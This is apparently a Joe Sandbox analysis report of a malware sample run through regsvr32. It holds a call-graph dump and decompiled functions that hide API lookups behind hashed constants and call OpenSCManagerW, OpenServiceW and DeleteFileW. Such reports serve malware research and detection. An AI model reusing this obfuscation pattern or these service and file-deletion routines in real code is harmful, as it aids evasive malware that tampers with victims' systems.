4320->4326 4321 27e4a9 4325 2717d2 GetPEB 4321->4325 4322 26adb7 GetPEB 4322->4326 4323 26303a 2 API calls 4323->4326 4324 27e5e8 4324->4324 4327 27e4b7 4325->4327 4326->4320 4326->4321 4326->4322 4326->4323 4326->4324 4328 27f94b GetPEB 4326->4328 4438 277e3d 4326->4438 4327->3946 4328->4326 4346 275be0 4329->4346 4330 26303a GetPEB RtlAllocateHeap 4330->4346 4331 27fd42 GetPEB 4331->4346 4332 27600d 4334 2717d2 GetPEB 4332->4334 4333 26e4f5 2 API calls 4333->4346 4336 275e22 4334->4336 4335 275db1 4449 26e4f5 4335->4449 4336->3946 4338 27f5d9 2 API calls 4338->4346 4340 275dc6 4453 26ec15 4340->4453 4341 26adb7 GetPEB 4341->4346 4343 27f94b GetPEB 4343->4346 4345 27f94b GetPEB 4345->4336 4346->4330 4346->4331 4346->4332 4346->4333 4346->4335 4346->4338 4346->4341 4346->4343 4457 26d360 4346->4457 4363 27bdce 4347->4363 4348 27ece4 GetPEB 4348->4363 4350 27f5d9 2 API calls 4350->4363 4353 27ced6 4493 27ece4 4353->4493 4355 2717d2 GetPEB 4355->4363 4358 27ceef 4358->3946 4360 27f94b GetPEB 4360->4363 4361 276561 GetPEB 4361->4363 4363->4348 4363->4350 4363->4353 4363->4355 4363->4358 4363->4360 4363->4361 4461 263129 4363->4461 4465 273d5b 4363->4465 4469 268d7e 4363->4469 4473 266d15 4363->4473 4476 2735a3 4363->4476 4485 26cafe 4363->4485 4489 27038b 4363->4489 4366 272b47 4364->4366 4367 272f8c 4366->4367 4368 272f8a 4366->4368 4370 26303a 2 API calls 4366->4370 4372 27fd42 GetPEB 4366->4372 4505 27a916 4366->4505 4512 27df2b 4366->4512 4369 2717d2 GetPEB 4367->4369 4368->3946 4369->4368 4370->4366 4372->4366 4374 27775f 4373->4374 4375 277a3f 4374->4375 4377 277a3d 4374->4377 4379 26303a 2 API calls 4374->4379 4410 264e8f 4374->4410 4376 264e8f GetPEB 4375->4376 4376->4377 4377->4317 4379->4374 4394 27af45 4380->4394 4381 27bd34 4382 272519 GetPEB 4381->4382 4384 27bd32 4382->4384 4383 26303a 2 API calls 4383->4394 4384->4317 4388 27f5d9 GetPEB RtlAllocateHeap 4388->4394 4391 2717d2 GetPEB 4391->4394 4392 26d2c9 GetPEB 4392->4394 4393 27f94b GetPEB 4393->4394 
4394->4381 4394->4383 4394->4384 4394->4388 4394->4391 4394->4392 4394->4393 4414 27fe12 4394->4414 4418 27ceff 4394->4418 4422 26500a 4394->4422 4426 264f68 4394->4426 4430 26eb4b 4394->4430 4396 276858 4395->4396 4397 27fd42 GetPEB 4396->4397 4398 2768c1 4397->4398 4398->4317 4400 27fd60 4399->4400 4434 276ca3 4400->4434 4404 274930 4403->4404 4405 26303a 2 API calls 4404->4405 4406 274e35 4404->4406 4408 274e1e 4404->4408 4409 2750d4 GetPEB 4404->4409 4405->4404 4407 2717d2 GetPEB 4406->4407 4407->4408 4408->4317 4409->4404 4411 264ea8 4410->4411 4412 27fd42 GetPEB 4411->4412 4413 264f5a 4412->4413 4413->4374 4415 27fe31 4414->4415 4416 267f78 GetPEB 4415->4416 4417 27feb7 4416->4417 4417->4394 4419 27cf1e 4418->4419 4420 267f78 GetPEB 4419->4420 4421 27cf8b 4420->4421 4421->4394 4423 26503a 4422->4423 4424 267f78 GetPEB 4423->4424 4425 2650b4 4424->4425 4425->4394 4427 264f81 4426->4427 4428 267f78 GetPEB 4427->4428 4429 264fff 4428->4429 4429->4394 4431 26eb77 4430->4431 4432 267f78 GetPEB 4431->4432 4433 26ebfc 4432->4433 4433->4394 4435 276cc5 4434->4435 4436 267f78 GetPEB 4435->4436 4437 276d2a 4436->4437 4437->4317 4439 277e55 4438->4439 4440 2780fc 4439->4440 4442 2780fa 4439->4442 4444 26303a 2 API calls 4439->4444 4445 281ce8 4439->4445 4443 281ce8 GetPEB 4440->4443 4442->4326 4443->4442 4444->4439 4446 281d0e 4445->4446 4447 267f78 GetPEB 4446->4447 4448 281d89 4447->4448 4448->4439 4450 26e508 4449->4450 4451 26303a 2 API calls 4450->4451 4452 26e5ee 4451->4452 4452->4340 4452->4452 4454 26ec31 4453->4454 4455 26adb7 GetPEB 4454->4455 4456 26ec4c 4455->4456 4456->4345 4458 26d385 4457->4458 4459 26adb7 GetPEB 4458->4459 4460 26d3a2 4459->4460 4460->4346 4462 263150 4461->4462 4463 267f78 GetPEB 4462->4463 4464 2631d5 4463->4464 4464->4363 4466 273d7e 4465->4466 4467 267f78 GetPEB 4466->4467 4468 273e01 4467->4468 4468->4363 4470 268db1 4469->4470 4471 267f78 GetPEB 4470->4471 4472 268e1f 4471->4472 4472->4363 4497 276361 4473->4497 4477 273831 
4476->4477 4478 27394d 4477->4478 4482 26303a GetPEB RtlAllocateHeap 4477->4482 4483 27fd42 GetPEB 4477->4483 4484 2717d2 GetPEB 4477->4484 4501 2719b1 4477->4501 4480 273955 4478->4480 4481 2717d2 GetPEB 4478->4481 4480->4363 4481->4480 4482->4477 4483->4477 4484->4477 4486 26cb2d 4485->4486 4487 267f78 GetPEB 4486->4487 4488 26cba6 4487->4488 4488->4363 4490 2703ad 4489->4490 4491 267f78 GetPEB 4490->4491 4492 27041d 4491->4492 4492->4363 4494 27ecfa 4493->4494 4495 267f78 GetPEB 4494->4495 4496 27ed6b 4495->4496 4496->4358 4498 276388 4497->4498 4499 267f78 GetPEB 4498->4499 4500 266dcb 4499->4500 4500->4363 4502 2719d4 4501->4502 4503 267f78 GetPEB 4502->4503 4504 271a6e 4503->4504 4504->4477 4506 27a945 4505->4506 4507 280908 GetPEB 4506->4507 4508 27aed1 4506->4508 4510 27aecf 4506->4510 4511 26303a 2 API calls 4506->4511 4507->4506 4509 2717d2 GetPEB 4508->4509 4509->4510 4510->4366 4511->4506 4514 27df4c 4512->4514 4515 27af0b 2 API calls 4514->4515 4516 27e15e 4514->4516 4517 26a762 4514->4517 4515->4514 4516->4366 4518 26a791 4517->4518 4519 267f78 GetPEB 4518->4519 4520 26a812 4519->4520 4520->4514 4522 262279 4521->4522 4523 267f78 GetPEB 4522->4523 4524 2622ec 4523->4524 4524->3954 4529 2770c6 4525->4529 4526 277715 4526->3957 4527 277717 4545 266eb4 4527->4545 4529->4526 4529->4527 4532 27f5d9 GetPEB RtlAllocateHeap 4529->4532 4533 281c9b GetPEB 4529->4533 4534 27f94b GetPEB 4529->4534 4535 278eb3 GetPEB 4529->4535 4536 277098 2 API calls 4529->4536 4537 2827c2 4529->4537 4541 26ec5d 4529->4541 4532->4529 4533->4529 4534->4529 4535->4529 4536->4529 4538 2827db 4537->4538 4539 267f78 GetPEB 4538->4539 4540 28284c 4539->4540 4540->4529 4542 26ec73 4541->4542 4543 267f78 GetPEB 4542->4543 4544 26ecfc 4543->4544 4544->4529 4546 266eca 4545->4546 4547 267f78 GetPEB 4546->4547 4548 266f59 4547->4548 4548->4526 4555 261cb1 4549->4555 4551 261daf 4551->3961 4552 261db1 4655 281be6 4552->4655 4555->4551 4555->4552 4638 273e89 4555->4638 4646 267013 4555->4646 
4651 270231 4555->4651 4577 26b6c5 4557->4577 4558 2826fc GetPEB 4558->4577 4560 26b9cb 4561 2702d8 2 API calls 4560->4561 4564 26b948 4561->4564 4563 26b94d 4565 274e54 3 API calls 4563->4565 4564->3961 4567 26b983 4565->4567 4566 280575 GetPEB 4566->4577 4567->4564 4570 2702d8 2 API calls 4567->4570 4568 2702d8 GetPEB CloseHandle 4568->4577 4569 262263 GetPEB 4569->4577 4572 26b9a8 4570->4572 4574 2702d8 2 API calls 4572->4574 4574->4564 4575 27f5d9 2 API calls 4575->4577 4576 278eb3 GetPEB 4576->4577 4577->4558 4577->4560 4577->4563 4577->4564 4577->4566 4577->4568 4577->4569 4577->4575 4577->4576 4578 27f94b GetPEB 4577->4578 4671 273983 4577->4671 4679 279054 4577->4679 4683 2805f6 4577->4683 4690 2671e3 4577->4690 4700 28131d 4577->4700 4578->4577 4727 268ce7 4580->4727 4582 2702d8 2 API calls 4599 26e08b 4582->4599 4583 277e3d 2 API calls 4583->4599 4584 274e54 3 API calls 4584->4599 4585 263466 2 API calls 4585->4599 4586 2717d2 GetPEB 4586->4599 4587 26e4cd 4587->3961 4589 270184 GetPEB 4589->4599 4590 280575 GetPEB 4590->4599 4591 26d467 GetPEB 4591->4599 4593 262263 GetPEB 4593->4599 4594 279054 GetPEB 4594->4599 4595 27f5d9 GetPEB RtlAllocateHeap 4595->4599 4596 278eb3 GetPEB 4596->4599 4597 27f94b GetPEB 4597->4599 4598 2805f6 3 API calls 4598->4599 4599->4582 4599->4583 4599->4584 4599->4585 4599->4586 4599->4587 4599->4589 4599->4590 4599->4591 4599->4593 4599->4594 4599->4595 4599->4596 4599->4597 4599->4598 4730 26a4de 4599->4730 4736 2768c8 4599->4736 4604 27701b 4600->4604 4601 27708b 4601->3961 4602 2717d2 GetPEB 4602->4604 4603 2679cc GetPEB 4603->4604 4604->4601 4604->4602 4604->4603 4605 281be6 GetPEB 4604->4605 4606 2702d8 2 API calls 4604->4606 4605->4604 4606->4604 4618 27a151 4607->4618 4608 263466 2 API calls 4608->4618 4609 27a36e 4609->3961 4610 280575 GetPEB 4610->4618 4611 262263 GetPEB 4611->4618 4612 279054 GetPEB 4612->4618 4613 27f5d9 GetPEB RtlAllocateHeap 4613->4618 4614 274e54 3 API calls 4614->4618 4615 278eb3 GetPEB 
4615->4618 4616 27f94b GetPEB 4616->4618 4617 2805f6 3 API calls 4617->4618 4618->4608 4618->4609 4618->4610 4618->4611 4618->4612 4618->4613 4618->4614 4618->4615 4618->4616 4618->4617 4625 26c3cc 4619->4625 4620 270231 GetPEB 4620->4625 4621 273e89 GetPEB 4621->4625 4622 26c4ca 4622->3961 4623 26c4cc 4624 281be6 GetPEB 4623->4624 4624->4622 4625->4620 4625->4621 4625->4622 4625->4623 4626 267013 GetPEB 4625->4626 4626->4625 4633 26999b 4627->4633 4628 274e54 3 API calls 4628->4633 4629 269aed 4629->3961 4630 280575 GetPEB 4630->4633 4631 262263 GetPEB 4631->4633 4632 279054 GetPEB 4632->4633 4633->4628 4633->4629 4633->4630 4633->4631 4633->4632 4634 27f5d9 2 API calls 4633->4634 4635 278eb3 GetPEB 4633->4635 4636 27f94b GetPEB 4633->4636 4637 2805f6 3 API calls 4633->4637 4634->4633 4635->4633 4636->4633 4637->4633 4639 273ea4 4638->4639 4640 274164 4639->4640 4659 26427c 4639->4659 4640->4555 4643 27fd42 GetPEB 4644 27411b 4643->4644 4644->4640 4645 27fd42 GetPEB 4644->4645 4645->4644 4649 26702a 4646->4649 4647 2671d4 4647->4555 4648 2631ea GetPEB 4648->4649 4649->4647 4649->4648 4663 281da1 4649->4663 4652 270256 4651->4652 4653 267f78 GetPEB 4652->4653 4654 2702c5 4653->4654 4654->4555 4656 281bf9 4655->4656 4667 27a873 4656->4667 4660 26429a 4659->4660 4661 267f78 GetPEB 4660->4661 4662 2642ff 4661->4662 4662->4640 4662->4643 4664 281dba 4663->4664 4665 267f78 GetPEB 4664->4665 4666 281e3b 4665->4666 4666->4649 4668 27a88e 4667->4668 4669 267f78 GetPEB 4668->4669 4670 27a906 4669->4670 4670->4551 4674 2739a7 4671->4674 4673 28131d GetPEB 4673->4674 4674->4673 4676 273b7f 4674->4676 4677 273b6a 4674->4677 4703 26cbbf 4674->4703 4707 27ec35 4674->4707 4676->4577 4678 2702d8 2 API calls 4677->4678 4678->4676 4680 27906e 4679->4680 4681 26cca2 GetPEB 4680->4681 4682 279163 4681->4682 4682->4577 4686 280618 4683->4686 4684 27a50a 2 API calls 4684->4686 4685 280876 4685->4577 4686->4684 4686->4685 4687 280863 4686->4687 4711 267e8a 4686->4711 4689 2702d8 2 API 
calls 4687->4689 4689->4685 4697 267223 4690->4697 4691 2725cd GetPEB 4691->4697 4693 26773f 4723 278e1d 4693->4723 4695 27f5d9 2 API calls 4695->4697 4696 26773d 4696->4577 4697->4691 4697->4693 4697->4695 4697->4696 4699 27f94b GetPEB 4697->4699 4715 2822f2 4697->4715 4719 2723c7 4697->4719 4699->4697 4701 267f78 GetPEB 4700->4701 4702 28139a 4701->4702 4702->4577 4704 26cbeb 4703->4704 4705 267f78 GetPEB 4704->4705 4706 26cc88 4705->4706 4706->4674 4708 27ec4c 4707->4708 4709 267f78 GetPEB 4708->4709 4710 27ecd5 4709->4710 4710->4674 4712 267eb1 4711->4712 4713 267f78 GetPEB 4712->4713 4714 267f13 4713->4714 4714->4686 4716 282310 4715->4716 4717 267f78 GetPEB 4716->4717 4718 2823a9 4717->4718 4718->4697 4720 272408 4719->4720 4721 267f78 GetPEB 4720->4721 4722 27247e 4721->4722 4722->4697 4724 278e30 4723->4724 4725 267f78 GetPEB 4724->4725 4726 278ea8 4725->4726 4726->4696 4728 267f78 GetPEB 4727->4728 4729 268d75 4728->4729 4729->4599 4731 26a504 4730->4731 4732 26a73d 4731->4732 4733 26303a 2 API calls 4731->4733 4734 26a73b 4731->4734 4735 264e8f GetPEB 4732->4735 4733->4731 4734->4599 4735->4734 4737 2768f7 4736->4737 4738 267f78 GetPEB 4737->4738 4739 27697d 4738->4739 4739->4599 4741 26d3d5 4740->4741 4742 267f78 GetPEB 4741->4742 4743 26d45b 4742->4743 4743->3977 4745 26c0ca 4744->4745 4746 267f78 GetPEB 4745->4746 4747 26c145 4746->4747 4747->3977 4749 280e0b 4748->4749 4750 267f78 GetPEB 4749->4750 4751 280e6a 4750->4751 4751->3982 4753 27266d 4752->4753 4754 267f78 GetPEB 4753->4754 4755 2726e4 4754->4755 4755->3982 4757 262312 4756->4757 4758 270430 GetPEB 4757->4758 4759 26303a 2 API calls 4757->4759 4760 2625ce 4757->4760 4761 262606 4757->4761 4758->4757 4759->4757 4770 270430 4760->4770 4761->3982 4764 267f78 GetPEB 4763->4764 4765 273e80 4764->4765 4765->3982 4767 267c8d 4766->4767 4768 267f78 GetPEB 4767->4768 4769 267cf8 4768->4769 4769->3982 4771 270463 4770->4771 4772 267f78 GetPEB 4771->4772 4773 2704eb 4772->4773 4773->4761 4775 27ee30 
4774->4775 4776 267f78 GetPEB 4775->4776 4777 27eeb4 4776->4777 4777->3827 4779 276d86 4778->4779 4780 267f78 GetPEB 4779->4780 4781 276e0c 4780->4781 4781->3996 4783 263f7b 4782->4783 4785 26419a 4783->4785 4786 2641f2 4783->4786 4803 263dfb 4783->4803 4787 26e4f5 2 API calls 4785->4787 4786->4006 4788 2641ac 4787->4788 4794 273094 4788->4794 4793 27f94b GetPEB 4793->4786 4807 273c24 4794->4807 4798 2641b8 4799 267f31 4798->4799 4800 267f56 4799->4800 4801 26adb7 GetPEB 4800->4801 4802 2641db 4801->4802 4802->4793 4804 263e15 4803->4804 4805 267f78 GetPEB 4804->4805 4806 263e89 4805->4806 4806->4783 4808 273c40 4807->4808 4809 267f78 GetPEB 4808->4809 4810 2731d0 4809->4810 4810->4798 4811 27660b 4810->4811 4812 276638 4811->4812 4813 267f78 GetPEB 4812->4813 4814 2766b2 4813->4814 4814->4798 4816 263ed1 4815->4816 4817 267f78 GetPEB 4816->4817 4818 263f40 4817->4818 4818->4010 4820 277a94 4819->4820 4821 267f78 GetPEB 4820->4821 4822 277b0d 4821->4822 4822->4010 4824 273cd4 4823->4824 4825 267f78 GetPEB 4824->4825 4826 273d50 4825->4826 4826->4010 4838 2786ee 4827->4838 4831 277bbf 4830->4831 4861 26bd6b 4831->4861 4834 277d95 4834->4024 4837 2702d8 2 API calls 4837->4834 4843 27871a 4838->4843 4840 278946 4842 2702d8 2 API calls 4840->4842 4844 26caf4 4842->4844 4843->4840 4843->4844 4847 26823e 4843->4847 4851 26be5e 4843->4851 4854 27fc9e 4843->4854 4858 2626a7 4843->4858 4844->4024 4848 268254 4847->4848 4849 267f78 GetPEB 4848->4849 4850 2682c4 4849->4850 4850->4843 4852 267f78 GetPEB 4851->4852 4853 26bed7 4852->4853 4853->4843 4855 27fcb7 4854->4855 4856 267f78 GetPEB 4855->4856 4857 27fd34 4856->4857 4857->4843 4859 271919 GetPEB 4858->4859 4860 2626f5 4859->4860 4860->4843 4862 267f78 GetPEB 4861->4862 4863 26bdda 4862->4863 4863->4834 4864 27f73b 4863->4864 4865 27f75d 4864->4865 4866 267f78 GetPEB 4865->4866 4867 277d83 4866->4867 4867->4837 4875 27e8c1 4868->4875 4869 27ea86 4871 2717d2 GetPEB 4869->4871 4870 26303a 2 API calls 4870->4875 4872 27ea97 
4871->4872 4872->4046 4874 27f5d9 2 API calls 4874->4875 4875->4869 4875->4870 4875->4872 4875->4874 4876 28224c GetPEB 4875->4876 4877 27f94b GetPEB 4875->4877 4886 278ef8 4875->4886 4876->4875 4877->4875 4879 278d46 4878->4879 4880 278d5c 4878->4880 4879->4880 4881 2717d2 GetPEB 4879->4881 4880->4046 4881->4879 4883 26be04 4882->4883 4890 267d03 4883->4890 4887 278f15 4886->4887 4888 26303a 2 API calls 4887->4888 4889 279000 4888->4889 4889->4875 4889->4889 4892 267d1b 4890->4892 4894 267e67 4892->4894 4896 267e65 4892->4896 4898 26303a 2 API calls 4892->4898 4899 270503 4892->4899 4915 278d61 4892->4915 4920 262710 4892->4920 4897 2717d2 GetPEB 4894->4897 4896->4046 4897->4896 4898->4892 4913 2712cb 4899->4913 4901 272519 GetPEB 4901->4913 4906 2717c5 4906->4892 4907 27a379 GetPEB 4907->4913 4909 27f5d9 GetPEB RtlAllocateHeap 4909->4913 4910 27fd42 GetPEB 4910->4913 4912 26d2c9 GetPEB 4912->4913 4913->4901 4913->4906 4913->4907 4913->4909 4913->4910 4913->4912 4914 27f94b GetPEB 4913->4914 4929 26866c 4913->4929 4933 2764cf 4913->4933 4937 26ed0a 4913->4937 4951 26c98b 4913->4951 4955 27970d 4913->4955 4959 26a838 4913->4959 4963 26c01c 4913->4963 4914->4913 4916 2764cf GetPEB 4915->4916 4917 278e04 4916->4917 4918 2717d2 GetPEB 4917->4918 4919 278e16 4918->4919 4919->4892 4921 262d16 4920->4921 4922 262edc 4921->4922 4924 262eda 4921->4924 4925 27f5d9 GetPEB RtlAllocateHeap 4921->4925 4926 26866c GetPEB 4921->4926 4927 26d2c9 GetPEB 4921->4927 4928 27f94b GetPEB 4921->4928 4923 272519 GetPEB 4922->4923 4923->4924 4924->4892 4925->4921 4926->4921 4927->4921 4928->4921 4930 2686a1 4929->4930 4931 267f78 GetPEB 4930->4931 4932 268728 4931->4932 4932->4913 4934 2764e2 4933->4934 4935 267f78 GetPEB 4934->4935 4936 276555 4935->4936 4936->4913 4950 26fc94 4937->4950 4938 27014c 4940 272519 GetPEB 4938->4940 4939 27014a 4939->4913 4940->4939 4941 2717d2 GetPEB 4941->4950 4943 26303a 2 API calls 4943->4950 4944 26eb4b GetPEB 4944->4950 4945 27f5d9 GetPEB 
RtlAllocateHeap 4945->4950 4946 27f94b GetPEB 4946->4950 4947 270184 GetPEB 4947->4950 4948 26d2c9 GetPEB 4948->4950 4950->4938 4950->4939 4950->4941 4950->4943 4950->4944 4950->4945 4950->4946 4950->4947 4950->4948 4967 267a69 4950->4967 4971 27a42c 4950->4971 4952 26c9a7 4951->4952 4953 267f78 GetPEB 4952->4953 4954 26ca27 4953->4954 4954->4913 4956 27972f 4955->4956 4957 267f78 GetPEB 4956->4957 4958 27979e 4957->4958 4958->4913 4960 26a865 4959->4960 4961 267f78 GetPEB 4960->4961 4962 26a8e7 4961->4962 4962->4913 4964 26c035 4963->4964 4965 267f78 GetPEB 4964->4965 4966 26c0ac 4965->4966 4966->4913 4968 267a97 4967->4968 4969 267f78 GetPEB 4968->4969 4970 267b06 4969->4970 4970->4950 4972 27a461 4971->4972 4973 267f78 GetPEB 4972->4973 4974 27a4e8 4973->4974 4974->4950 4977 281a26 4975->4977 4976 2725cd GetPEB 4976->4977 4977->4976 4978 281b7b 4977->4978 4980 281b98 4977->4980 4999 2694d4 4977->4999 4995 2633b6 4978->4995 4980->4057 4984 26c83c 4982->4984 4983 27f5d9 2 API calls 4983->4984 4984->4983 4985 26c967 4984->4985 4986 263e99 GetPEB 4984->4986 4988 26c965 4984->4988 4989 27f94b GetPEB 4984->4989 5003 266c71 4984->5003 4987 273cbe GetPEB 4985->4987 4986->4984 4987->4988 4988->4057 4989->4984 4992 2635ca 4991->4992 4993 267f78 GetPEB 4992->4993 4994 263643 4993->4994 4994->4058 4996 2633d4 4995->4996 4997 267f78 GetPEB 4996->4997 4998 263453 4997->4998 4998->4980 5000 2694f1 4999->5000 5001 267f78 GetPEB 5000->5001 5002 26957c 5001->5002 5002->4977 5004 266c8e 5003->5004 5005 267f78 GetPEB 5004->5005 5006 266d06 5005->5006 5006->4984 5048 276998 5049 262263 GetPEB 5048->5049 5050 276c12 5049->5050 5051 26bee4 GetPEB 5050->5051 5052 276c2b 5051->5052 5053 276c95 5052->5053 5054 27f5d9 2 API calls 5052->5054 5055 276c49 5054->5055 5056 278eb3 GetPEB 5055->5056 5057 276c70 5056->5057 5058 27f94b GetPEB 5057->5058 5059 276c83 5058->5059 5060 267bc6 2 API calls 5059->5060 5060->5053

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 431 266e01-266eb3 call 26c98a call 267f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00266E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				E0026C98A(_t36);
                                                                                                                				_v32 = 0x5e4691;
                                                                                                                				_v28 = 0xb22c2d;
                                                                                                                				_v24 = 0xd08f35;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0x466167;
                                                                                                                				_t48 = 0x37;
                                                                                                                				_v16 = _v16 / _t48;
                                                                                                                				_v16 = _v16 ^ 0x000b48c4;
                                                                                                                				_v8 = 0x78b9b;
                                                                                                                				_t49 = 0x12;
                                                                                                                				_v8 = _v8 / _t49;
                                                                                                                				_v8 = _v8 + 0x94cf;
                                                                                                                				_v8 = _v8 ^ 0x0006a86d;
                                                                                                                				_v12 = 0x7d284b;
                                                                                                                				_v12 = _v12 + 0xfffff9ba;
                                                                                                                				_v12 = _v12 ^ 0x007a5aaa;
                                                                                                                				E00267F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
                                                                                                                				_t46 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                				return _t46;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00266EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: b4863041ab4aaa9f4182a75e22e100b1dfc3edea479e6aaad550dcf02ae0f7aa
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: B21155B2D01218BBDB04DFA5C8498DEBFB6EF45314F10C189FA18A7241D7B55B259F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 268e38-268ee4 call 26c98a call 267f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00268E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t37;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				int _t53;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0026C98A(_t37);
                                                                                                                				_v12 = 0x1c994a;
                                                                                                                				_v12 = _v12 << 3;
                                                                                                                				_v12 = _v12 + 0xffff2161;
                                                                                                                				_v12 = _v12 | 0xd2ae04c7;
                                                                                                                				_v12 = _v12 ^ 0xd2e10dca;
                                                                                                                				_v8 = 0x3225a3;
                                                                                                                				_v8 = _v8 + 0xb485;
                                                                                                                				_t48 = 0x24;
                                                                                                                				_v8 = _v8 / _t48;
                                                                                                                				_v8 = _v8 + 0x1169;
                                                                                                                				_v8 = _v8 ^ 0x000adbd5;
                                                                                                                				_v16 = 0x918fbd;
                                                                                                                				_v16 = _v16 * 0x4a;
                                                                                                                				_v16 = _v16 ^ 0x2a1cf10f;
                                                                                                                				E00267F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
                                                                                                                				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
                                                                                                                				return _t46;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00268EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: 05e7c7b0d067aeba8b5b517e28cd82613acf27fc765d5395de659da942455182
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: EF112271E01208FBEF05EFA4DA4A8DEBFB6EB05314F10C089E914A6250E7B55B609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 267bc6-267c79 call 26c98a call 267f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00267BC6(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t42;
                                                                                                                				int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E0026C98A(_t42);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0xa8f244;
                                                                                                                				_v16 = 0x845cf1;
                                                                                                                				_t54 = 0x49;
                                                                                                                				_v16 = _v16 / _t54;
                                                                                                                				_v16 = _v16 | 0x150b5070;
                                                                                                                				_v16 = _v16 ^ 0x15045549;
                                                                                                                				_v12 = 0xcbfb15;
                                                                                                                				_v12 = _v12 ^ 0x1a866322;
                                                                                                                				_v12 = _v12 + 0xffff3502;
                                                                                                                				_v12 = _v12 ^ 0x1a48e6f8;
                                                                                                                				_v8 = 0xe2385a;
                                                                                                                				_v8 = _v8 | 0xfdf9d9f4;
                                                                                                                				_t55 = 0x6e;
                                                                                                                				_v8 = _v8 / _t55;
                                                                                                                				_v8 = _v8 + 0xffffa480;
                                                                                                                				_v8 = _v8 ^ 0x02430dde;
                                                                                                                				E00267F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
                                                                                                                				_t52 = DeleteFileW(_a4); // executed
                                                                                                                				return _t52;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 00267C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
